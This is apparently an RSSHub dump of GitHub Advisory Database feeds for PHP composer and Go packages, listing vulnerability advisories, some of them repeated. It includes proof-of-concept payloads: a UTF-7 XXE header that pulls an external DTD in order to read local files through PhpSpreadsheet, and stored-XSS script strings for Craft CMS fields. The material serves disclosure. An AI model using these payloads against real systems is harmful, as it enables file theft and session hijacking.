<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/composer" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:16 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code> $pattern = '/encoding="(.*?)"/';</code> is easy to bypass: just use a single quote symbol <code>'</code>. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file inside an xlsx-formatted file, such as the sharedStrings.xml file, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create a simple xlsx file.</li>
<li>Rename the xlsx to zip.</li>
<li>Go into the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code>.</li>
<li>Don't forget that you can use PHP wrappers in XXE; some php:// wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>Unescaped entity property enables JavaScript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because %source_label% in the twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>clone example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>create author with FullName </li>
<li>delete author</li>
<li>view audit of authors</li>
<li>alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>Persistent XSS: JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</li>
<li>In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</li>
<li>In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In <strong>/admin/myaccount</strong> and the pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Categories page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access to the Settings -&gt; Categories ( /admin/settings/categories )
2. Create new category group
3. Access to the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access to the Category edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entries page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access to the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create new entry type
3. Access to the Settings -&gt; Sections ( /admin/settings/sections )
4. Create new section
5. Access to the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access to the Entry edit page again and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In <strong>/admin/myaccount</strong> and the pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access to the My Account Page ( /admin/myaccount )
2. Input the Full Name column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Push the Save button
4. Access to the My Account page ( /admin/myaccount ) or pages under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.) and it triggers xss
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful has Insecure HTTPS Connections due to Missing Default Certificate Validation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an &lt;a&gt; tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code> $pattern = '/encoding="(.*?)"/';</code> is easy to bypass. Just use a single quote symbol <code>'</code>. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file inside an xlsx file, such as the sharedStrings.xml file, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal PHP code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code></li>
<li>Don't forget that you can use PHP wrappers in XXE; some php:// wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss> ...
http://localhost:1200/github-advisor/data/go - Success ✔️
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - go</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/go" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - go - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:16 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[github.com/jackc/pgproto3/v2] pgproto3 SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v2.3.3.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-27304">https://nvd.nist.gov/vuln/detail/CVE-2024-27304</a></li>
<li><a href="https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007">https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
<li><a href="https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4">https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4</a></li>
<li><a href="https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8">https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8</a></li>
<li><a href="https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df">https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df</a></li>
<li><a href="https://github.com/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-7jwh-3vrq-q3m8</guid>
<author>GitHub</author>
</item>
<item>
<title>[github.com/jackc/pgx/v5] pgx SQL Injection via Protocol Message Size Overflow</title>
<description><h3 id="impact">Impact</h3>
<p>SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control.</p>
<h3 id="patches">Patches</h3>
<p>The problem is resolved in v4.18.2 and v5.5.4.</p>
<h3 id="workarounds">Workarounds</h3>
<p>Reject user input large enough to cause a single query or bind message to exceed 4 GB in size.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8">https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8</a></li>
<li><a href="https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv">https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv</a></li>
